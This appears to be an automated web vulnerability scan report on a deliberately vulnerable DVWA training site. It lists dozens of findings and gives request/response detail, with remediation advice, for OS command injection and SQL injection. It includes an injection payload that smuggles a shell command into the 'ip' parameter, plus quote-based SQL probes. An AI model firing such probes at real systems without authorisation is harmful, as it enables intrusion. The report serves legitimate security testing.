Example Report Pentest Online
Summary
The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low, Information or False Positive. This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that was used to identify the issue.
|
|
Confidence |
|
|
Certain |
Firm |
Tentative |
Total |
Severity |
High |
12 |
4 |
0 |
16 |
Medium |
69 |
1 |
0 |
70 |
Low |
116 |
1 |
0 |
117 |
Information |
56 |
39 |
9 |
104 |
False Positive |
0 |
0 |
0 |
0 |
The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the bars fade as the confidence level falls.
|
|
Number of issues |
|
|
0 |
20 |
40 |
60 |
80 |
100 |
120 |
Severity |
High |
|
|
Medium |
|
|
Low |
|
|
Contents
1. OS command injection
2. SQL injection
2.1. https://pentest-ground.com:4280/vulnerabilities/sqli/ [id parameter]
2.2. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/ [id parameter]
3. File path traversal
4. Out-of-band resource load (HTTP)
5. Cross-site scripting (reflected)
5.1. https://pentest-ground.com:4280/vulnerabilities/csp/ [include parameter]
5.2. https://pentest-ground.com:4280/vulnerabilities/csp/ [include parameter]
5.3. https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php [username parameter]
5.4. https://pentest-ground.com:4280/vulnerabilities/view_source.php [id parameter]
5.5. https://pentest-ground.com:4280/vulnerabilities/view_source.php [id parameter]
5.6. https://pentest-ground.com:4280/vulnerabilities/view_source.php [security parameter]
5.7. https://pentest-ground.com:4280/vulnerabilities/xss_r/ [name parameter]
5.8. https://pentest-ground.com:4280/vulnerabilities/xss_s/ [mtxMessage parameter]
5.9. https://pentest-ground.com:4280/vulnerabilities/xss_s/ [txtName parameter]
5.10. https://pentest-ground.com:4280/vulnerabilities/brute/ [security cookie]
5.11. https://pentest-ground.com:4280/vulnerabilities/captcha/ [security cookie]
5.12. https://pentest-ground.com:4280/vulnerabilities/csp/ [security cookie]
5.13. https://pentest-ground.com:4280/vulnerabilities/csrf/ [security cookie]
5.14. https://pentest-ground.com:4280/vulnerabilities/exec/ [security cookie]
5.15. https://pentest-ground.com:4280/vulnerabilities/fi/ [security cookie]
5.16. https://pentest-ground.com:4280/vulnerabilities/javascript/ [security cookie]
5.17. https://pentest-ground.com:4280/vulnerabilities/open_redirect/ [security cookie]
5.18. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/info.php [security cookie]
5.19. https://pentest-ground.com:4280/vulnerabilities/sqli/ [security cookie]
5.20. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/ [security cookie]
5.21. https://pentest-ground.com:4280/vulnerabilities/upload/ [security cookie]
5.22. https://pentest-ground.com:4280/vulnerabilities/weak_id/ [security cookie]
5.23. https://pentest-ground.com:4280/vulnerabilities/xss_d/ [security cookie]
5.24. https://pentest-ground.com:4280/vulnerabilities/xss_r/ [security cookie]
5.25. https://pentest-ground.com:4280/vulnerabilities/xss_s/ [security cookie]
5.26. https://pentest-ground.com:4280/vulnerabilities/fi/ [Referer HTTP header]
5.27. https://pentest-ground.com:4280/vulnerabilities/fi/ [User-Agent HTTP header]
6. Cross-site scripting (DOM-based)
7. External service interaction (HTTP)
8. TLS cookie without secure flag set
8.1. https://pentest-ground.com:4280/
8.2. https://pentest-ground.com:4280/security.php
9. Strict Transport Security Misconfiguration
9.1. https://pentest-ground.com:4280/
9.2. https://pentest-ground.com:4280/README.ar.md
9.3. https://pentest-ground.com:4280/README.es.md
9.4. https://pentest-ground.com:4280/README.fa.md
9.5. https://pentest-ground.com:4280/README.fr.md
9.6. https://pentest-ground.com:4280/README.pt.md
9.7. https://pentest-ground.com:4280/README.tr.md
9.8. https://pentest-ground.com:4280/README.zh.md
9.9. https://pentest-ground.com:4280/about.php
9.10. https://pentest-ground.com:4280/compose.yml
9.11. https://pentest-ground.com:4280/config/config.inc.php
9.12. https://pentest-ground.com:4280/docs/DVWA_v1.3.pdf
9.13. https://pentest-ground.com:4280/docs/graphics/docker/detail.png
9.14. https://pentest-ground.com:4280/docs/graphics/docker/overview.png
9.15. https://pentest-ground.com:4280/dvwa/css/help.css
9.16. https://pentest-ground.com:4280/dvwa/css/login.css
9.17. https://pentest-ground.com:4280/dvwa/css/main.css
9.18. https://pentest-ground.com:4280/dvwa/css/source.css
9.19. https://pentest-ground.com:4280/dvwa/images/lock.png
9.20. https://pentest-ground.com:4280/dvwa/images/login_logo.png
9.21. https://pentest-ground.com:4280/dvwa/images/logo.png
9.22. https://pentest-ground.com:4280/dvwa/images/spanner.png
9.23. https://pentest-ground.com:4280/dvwa/js/add_event_listeners.js
9.24. https://pentest-ground.com:4280/dvwa/js/dvwaPage.js
9.25. https://pentest-ground.com:4280/hackable/uploads/
9.26. https://pentest-ground.com:4280/instructions.php
9.27. https://pentest-ground.com:4280/login.php
9.28. https://pentest-ground.com:4280/logout.php
9.29. https://pentest-ground.com:4280/phpinfo.php
9.30. https://pentest-ground.com:4280/robots.txt
9.31. https://pentest-ground.com:4280/security.php
9.32. https://pentest-ground.com:4280/setup.php
9.33. https://pentest-ground.com:4280/vulnerabilities/brute/
9.34. https://pentest-ground.com:4280/vulnerabilities/captcha/
9.35. https://pentest-ground.com:4280/vulnerabilities/csp/
9.36. https://pentest-ground.com:4280/vulnerabilities/csp/WvEMlU
9.37. https://pentest-ground.com:4280/vulnerabilities/csrf/
9.38. https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
9.39. https://pentest-ground.com:4280/vulnerabilities/exec/
9.40. https://pentest-ground.com:4280/vulnerabilities/fi/
9.41. https://pentest-ground.com:4280/vulnerabilities/javascript/
9.42. https://pentest-ground.com:4280/vulnerabilities/open_redirect/
9.43. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/info.php
9.44. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/low.php
9.45. https://pentest-ground.com:4280/vulnerabilities/sqli/
9.46. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
9.47. https://pentest-ground.com:4280/vulnerabilities/upload/
9.48. https://pentest-ground.com:4280/vulnerabilities/view_help.php
9.49. https://pentest-ground.com:4280/vulnerabilities/view_source.php
9.50. https://pentest-ground.com:4280/vulnerabilities/weak_id/
9.51. https://pentest-ground.com:4280/vulnerabilities/xss_d/
9.52. https://pentest-ground.com:4280/vulnerabilities/xss_r/
9.53. https://pentest-ground.com:4280/vulnerabilities/xss_s/
10. Password submitted using GET method
11. Open redirection (reflected)
12. Cookie without HttpOnly flag set
12.1. https://pentest-ground.com:4280/
12.2. https://pentest-ground.com:4280/security.php
13. Unencrypted communications
14. Strict transport security not enforced
15. Content Sniffing not disabled
15.1. http://pentest-ground.com:4280/
15.2. http://pentest-ground.com:4280/robots.txt
15.3. https://pentest-ground.com:4280/
15.4. https://pentest-ground.com:4280/README.ar.md
15.5. https://pentest-ground.com:4280/README.es.md
15.6. https://pentest-ground.com:4280/README.fa.md
15.7. https://pentest-ground.com:4280/README.fr.md
15.8. https://pentest-ground.com:4280/README.pt.md
15.9. https://pentest-ground.com:4280/README.tr.md
15.10. https://pentest-ground.com:4280/README.zh.md
15.11. https://pentest-ground.com:4280/about.php
15.12. https://pentest-ground.com:4280/compose.yml
15.13. https://pentest-ground.com:4280/config/config.inc.php
15.14. https://pentest-ground.com:4280/docs/DVWA_v1.3.pdf
15.15. https://pentest-ground.com:4280/docs/graphics/docker/detail.png
15.16. https://pentest-ground.com:4280/docs/graphics/docker/overview.png
15.17. https://pentest-ground.com:4280/dvwa/css/help.css
15.18. https://pentest-ground.com:4280/dvwa/css/login.css
15.19. https://pentest-ground.com:4280/dvwa/css/main.css
15.20. https://pentest-ground.com:4280/dvwa/css/source.css
15.21. https://pentest-ground.com:4280/dvwa/images/lock.png
15.22. https://pentest-ground.com:4280/dvwa/images/login_logo.png
15.23. https://pentest-ground.com:4280/dvwa/images/logo.png
15.24. https://pentest-ground.com:4280/dvwa/images/spanner.png
15.25. https://pentest-ground.com:4280/dvwa/js/add_event_listeners.js
15.26. https://pentest-ground.com:4280/dvwa/js/dvwaPage.js
15.27. https://pentest-ground.com:4280/hackable/uploads/
15.28. https://pentest-ground.com:4280/instructions.php
15.29. https://pentest-ground.com:4280/login.php
15.30. https://pentest-ground.com:4280/logout.php
15.31. https://pentest-ground.com:4280/phpinfo.php
15.32. https://pentest-ground.com:4280/robots.txt
15.33. https://pentest-ground.com:4280/security.php
15.34. https://pentest-ground.com:4280/setup.php
15.35. https://pentest-ground.com:4280/vulnerabilities/brute/
15.36. https://pentest-ground.com:4280/vulnerabilities/captcha/
15.37. https://pentest-ground.com:4280/vulnerabilities/csp/
15.38. https://pentest-ground.com:4280/vulnerabilities/csp/WvEMlU
15.39. https://pentest-ground.com:4280/vulnerabilities/csrf/
15.40. https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
15.41. https://pentest-ground.com:4280/vulnerabilities/exec/
15.42. https://pentest-ground.com:4280/vulnerabilities/fi/
15.43. https://pentest-ground.com:4280/vulnerabilities/javascript/
15.44. https://pentest-ground.com:4280/vulnerabilities/open_redirect/
15.45. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/info.php
15.46. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/low.php
15.47. https://pentest-ground.com:4280/vulnerabilities/sqli/
15.48. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
15.49. https://pentest-ground.com:4280/vulnerabilities/upload/
15.50. https://pentest-ground.com:4280/vulnerabilities/view_help.php
15.51. https://pentest-ground.com:4280/vulnerabilities/view_source.php
15.52. https://pentest-ground.com:4280/vulnerabilities/weak_id/
15.53. https://pentest-ground.com:4280/vulnerabilities/xss_d/
15.54. https://pentest-ground.com:4280/vulnerabilities/xss_r/
15.55. https://pentest-ground.com:4280/vulnerabilities/xss_s/
16. Browser cross-site scripting filter misconfiguration
16.1. http://pentest-ground.com:4280/
16.2. http://pentest-ground.com:4280/robots.txt
16.3. https://pentest-ground.com:4280/
16.4. https://pentest-ground.com:4280/README.ar.md
16.5. https://pentest-ground.com:4280/README.es.md
16.6. https://pentest-ground.com:4280/README.fa.md
16.7. https://pentest-ground.com:4280/README.fr.md
16.8. https://pentest-ground.com:4280/README.pt.md
16.9. https://pentest-ground.com:4280/README.tr.md
16.10. https://pentest-ground.com:4280/README.zh.md
16.11. https://pentest-ground.com:4280/about.php
16.12. https://pentest-ground.com:4280/compose.yml
16.13. https://pentest-ground.com:4280/config/config.inc.php
16.14. https://pentest-ground.com:4280/docs/DVWA_v1.3.pdf
16.15. https://pentest-ground.com:4280/docs/graphics/docker/detail.png
16.16. https://pentest-ground.com:4280/docs/graphics/docker/overview.png
16.17. https://pentest-ground.com:4280/dvwa/css/help.css
16.18. https://pentest-ground.com:4280/dvwa/css/login.css
16.19. https://pentest-ground.com:4280/dvwa/css/main.css
16.20. https://pentest-ground.com:4280/dvwa/css/source.css
16.21. https://pentest-ground.com:4280/dvwa/images/lock.png
16.22. https://pentest-ground.com:4280/dvwa/images/login_logo.png
16.23. https://pentest-ground.com:4280/dvwa/images/logo.png
16.24. https://pentest-ground.com:4280/dvwa/images/spanner.png
16.25. https://pentest-ground.com:4280/dvwa/js/add_event_listeners.js
16.26. https://pentest-ground.com:4280/dvwa/js/dvwaPage.js
16.27. https://pentest-ground.com:4280/hackable/uploads/
16.28. https://pentest-ground.com:4280/instructions.php
16.29. https://pentest-ground.com:4280/login.php
16.30. https://pentest-ground.com:4280/logout.php
16.31. https://pentest-ground.com:4280/phpinfo.php
16.32. https://pentest-ground.com:4280/robots.txt
16.33. https://pentest-ground.com:4280/security.php
16.34. https://pentest-ground.com:4280/setup.php
16.35. https://pentest-ground.com:4280/vulnerabilities/brute/
16.36. https://pentest-ground.com:4280/vulnerabilities/captcha/
16.37. https://pentest-ground.com:4280/vulnerabilities/csp/
16.38. https://pentest-ground.com:4280/vulnerabilities/csp/WvEMlU
16.39. https://pentest-ground.com:4280/vulnerabilities/csrf/
16.40. https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
16.41. https://pentest-ground.com:4280/vulnerabilities/exec/
16.42. https://pentest-ground.com:4280/vulnerabilities/fi/
16.43. https://pentest-ground.com:4280/vulnerabilities/javascript/
16.44. https://pentest-ground.com:4280/vulnerabilities/open_redirect/
16.45. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/info.php
16.46. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/low.php
16.47. https://pentest-ground.com:4280/vulnerabilities/sqli/
16.48. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
16.49. https://pentest-ground.com:4280/vulnerabilities/upload/
16.50. https://pentest-ground.com:4280/vulnerabilities/view_help.php
16.51. https://pentest-ground.com:4280/vulnerabilities/view_source.php
16.52. https://pentest-ground.com:4280/vulnerabilities/weak_id/
16.53. https://pentest-ground.com:4280/vulnerabilities/xss_d/
16.54. https://pentest-ground.com:4280/vulnerabilities/xss_s/
17. Arbitrary host header accepted
18. File path manipulation
18.1. https://pentest-ground.com:4280/vulnerabilities/view_help.php [id parameter]
18.2. https://pentest-ground.com:4280/vulnerabilities/view_source.php [id parameter]
18.3. https://pentest-ground.com:4280/vulnerabilities/view_source.php [security parameter]
19. Path-relative style sheet import
19.1. https://pentest-ground.com:4280/
19.2. https://pentest-ground.com:4280/about.php
19.3. https://pentest-ground.com:4280/instructions.php
19.4. https://pentest-ground.com:4280/login.php
19.5. https://pentest-ground.com:4280/security.php
19.6. https://pentest-ground.com:4280/setup.php
19.7. https://pentest-ground.com:4280/vulnerabilities/brute/
19.8. https://pentest-ground.com:4280/vulnerabilities/captcha/
19.9. https://pentest-ground.com:4280/vulnerabilities/csp/
19.10. https://pentest-ground.com:4280/vulnerabilities/csrf/
19.11. https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
19.12. https://pentest-ground.com:4280/vulnerabilities/exec/
19.13. https://pentest-ground.com:4280/vulnerabilities/fi/
19.14. https://pentest-ground.com:4280/vulnerabilities/javascript/
19.15. https://pentest-ground.com:4280/vulnerabilities/open_redirect/
19.16. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/info.php
19.17. https://pentest-ground.com:4280/vulnerabilities/sqli/
19.18. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
19.19. https://pentest-ground.com:4280/vulnerabilities/upload/
19.20. https://pentest-ground.com:4280/vulnerabilities/view_help.php
19.21. https://pentest-ground.com:4280/vulnerabilities/view_source.php
19.22. https://pentest-ground.com:4280/vulnerabilities/weak_id/
19.23. https://pentest-ground.com:4280/vulnerabilities/xss_d/
19.24. https://pentest-ground.com:4280/vulnerabilities/xss_r/
19.25. https://pentest-ground.com:4280/vulnerabilities/xss_s/
20. Content security policy: allowlisted script resources
21. Content security policy: allows untrusted style execution
22. Content security policy: allows clickjacking
23. Content security policy: allows form hijacking
24. Cross-site request forgery
24.1. https://pentest-ground.com:4280/security.php
24.2. https://pentest-ground.com:4280/setup.php
24.3. https://pentest-ground.com:4280/vulnerabilities/csp/
24.4. https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
24.5. https://pentest-ground.com:4280/vulnerabilities/exec/
24.6. https://pentest-ground.com:4280/vulnerabilities/javascript/
24.7. https://pentest-ground.com:4280/vulnerabilities/upload/
24.8. https://pentest-ground.com:4280/vulnerabilities/weak_id/
25. External service interaction (DNS)
25.1. https://pentest-ground.com:4280/vulnerabilities/exec/ [ip parameter]
25.2. https://pentest-ground.com:4280/vulnerabilities/fi/ [page parameter]
26. Referer-dependent response
26.1. https://pentest-ground.com:4280/phpinfo.php
26.2. https://pentest-ground.com:4280/vulnerabilities/fi/
27. Spoofable client IP address
27.1. https://pentest-ground.com:4280/phpinfo.php
27.2. https://pentest-ground.com:4280/vulnerabilities/fi/
28. User agent-dependent response
28.1. http://pentest-ground.com:4280/
28.2. http://pentest-ground.com:4280/robots.txt
28.3. https://pentest-ground.com:4280/phpinfo.php
28.4. https://pentest-ground.com:4280/vulnerabilities/fi/
29. Input returned in response (reflected)
29.1. https://pentest-ground.com:4280/phpinfo.php [PHPSESSID cookie]
29.2. https://pentest-ground.com:4280/phpinfo.php [Referer HTTP header]
29.3. https://pentest-ground.com:4280/phpinfo.php [User-Agent HTTP header]
29.4. https://pentest-ground.com:4280/phpinfo.php [name of an arbitrarily supplied URL parameter]
29.5. https://pentest-ground.com:4280/phpinfo.php [security cookie]
29.6. https://pentest-ground.com:4280/vulnerabilities/brute/ [security cookie]
29.7. https://pentest-ground.com:4280/vulnerabilities/captcha/ [security cookie]
29.8. https://pentest-ground.com:4280/vulnerabilities/csp/ [include parameter]
29.9. https://pentest-ground.com:4280/vulnerabilities/csp/ [security cookie]
29.10. https://pentest-ground.com:4280/vulnerabilities/csrf/ [security cookie]
29.11. https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php [username parameter]
29.12. https://pentest-ground.com:4280/vulnerabilities/exec/ [security cookie]
29.13. https://pentest-ground.com:4280/vulnerabilities/fi/ [Referer HTTP header]
29.14. https://pentest-ground.com:4280/vulnerabilities/fi/ [User-Agent HTTP header]
29.15. https://pentest-ground.com:4280/vulnerabilities/fi/ [page parameter]
29.16. https://pentest-ground.com:4280/vulnerabilities/fi/ [security cookie]
29.17. https://pentest-ground.com:4280/vulnerabilities/javascript/ [security cookie]
29.18. https://pentest-ground.com:4280/vulnerabilities/open_redirect/ [security cookie]
29.19. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/info.php [security cookie]
29.20. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/low.php [redirect parameter]
29.21. https://pentest-ground.com:4280/vulnerabilities/sqli/ [id parameter]
29.22. https://pentest-ground.com:4280/vulnerabilities/sqli/ [security cookie]
29.23. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/ [id parameter]
29.24. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/ [security cookie]
29.25. https://pentest-ground.com:4280/vulnerabilities/upload/ [filename multipart parameter attribute]
29.26. https://pentest-ground.com:4280/vulnerabilities/upload/ [security cookie]
29.27. https://pentest-ground.com:4280/vulnerabilities/view_help.php [id parameter]
29.28. https://pentest-ground.com:4280/vulnerabilities/view_help.php [locale parameter]
29.29. https://pentest-ground.com:4280/vulnerabilities/view_source.php [id parameter]
29.30. https://pentest-ground.com:4280/vulnerabilities/view_source.php [security parameter]
29.31. https://pentest-ground.com:4280/vulnerabilities/weak_id/ [security cookie]
29.32. https://pentest-ground.com:4280/vulnerabilities/xss_d/ [security cookie]
29.33. https://pentest-ground.com:4280/vulnerabilities/xss_r/ [name parameter]
29.34. https://pentest-ground.com:4280/vulnerabilities/xss_r/ [security cookie]
29.35. https://pentest-ground.com:4280/vulnerabilities/xss_s/ [mtxMessage parameter]
29.36. https://pentest-ground.com:4280/vulnerabilities/xss_s/ [security cookie]
29.37. https://pentest-ground.com:4280/vulnerabilities/xss_s/ [txtName parameter]
30. Suspicious input transformation (reflected)
31. Cross-domain Referer leakage
32. Cross-domain script include
33. File upload functionality
34. Frameable response (potential Clickjacking)
35. Browser cross-site scripting filter disabled
36. Link manipulation (reflected)
36.1. https://pentest-ground.com:4280/security.php [name of an arbitrarily supplied URL parameter]
36.2. https://pentest-ground.com:4280/setup.php [name of an arbitrarily supplied URL parameter]
37. Private IP addresses disclosed
37.1. https://pentest-ground.com:4280/phpinfo.php
37.2. https://pentest-ground.com:4280/vulnerabilities/fi/
38. Robots.txt file
39. Cacheable HTTPS response
40. HTML does not specify charset
40.1. http://pentest-ground.com:4280/
40.2. http://pentest-ground.com:4280/robots.txt
41. TLS certificate
1. OS command injection
Next
Summary
|
Severity: |
High |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/exec/ |
Issue detail
The ip parameter appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands and retrieve the output in the application's responses.
The payload |echo s38p3k8m50 ado38ydj5y||a #' |echo s38p3k8m50 ado38ydj5y||a #|" |echo s38p3k8m50 ado38ydj5y||a # was submitted in the ip parameter. The application's response appears to contain the output from the injected command, indicating that the command was executed.
Issue background
Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. It may also be possible to use the server as a platform for attacks against other systems. The exact potential for exploitation depends upon the security context in which the command is executed, and the privileges that this context has regarding sensitive resources on the server.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:
- The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
- The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defense can mitigate the impact of an attack even in the event that an attacker circumvents the input validation defenses.
References
Vulnerability classifications
Request
POST /vulnerabilities/exec/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=bca0c6b44a088e607426bc0fbe581082
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/exec/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 23
ip=CcwtLI%7cecho%20s38p3k8m50%20ado38ydj5y%7c%7ca%20%23'%20%7cecho%20s38p3k8m50%20ado38ydj5y%7c%7ca%20%23%7c%22%20%7cecho%20s38p3k8m50%20ado38ydj5y%7c%7ca%20%23&Submit=Submit
Response
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:49 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4126
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Command Injection :: Damn Vulnerable Web Application (DVW
...[SNIP]...
<pre>s38p3k8m50 ado38ydj5y
</pre>
...[SNIP]...
2. SQL injection
Previous
Next
There are 2 instances of this issue:
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterized queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterized queries. It is strongly recommended that you parameterize every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
- One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string into which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
- Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
References
Vulnerability classifications
2.1. https://pentest-ground.com:4280/vulnerabilities/sqli/ [id parameter]
Next
Summary
|
Severity: |
High |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli/ |
Issue detail
The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /vulnerabilities/sqli/?id=946146'&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=21775aa7d09a4979abf3a2808b744447
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 586
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''946146''' at line 1 in /var/www/html/vulnerabilities/sqli/source/low.php:11
Stack trace:
#0 /var/ww
...[SNIP]...
Request 2
GET /vulnerabilities/sqli/?id=946146''&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=21775aa7d09a4979abf3a2808b744447
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:31 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4064
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection :: Damn Vulnerable Web Application (DVWA)</
...[SNIP]...
2.2. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/ [id parameter]
Previous
Next
Summary
|
Severity: |
High |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli_blind/ |
Issue detail
The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /vulnerabilities/sqli_blind/?id=294674'&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=89f91250018af100116bd6bd0a002a6a
Upgrade-Insecure-Requests: 1
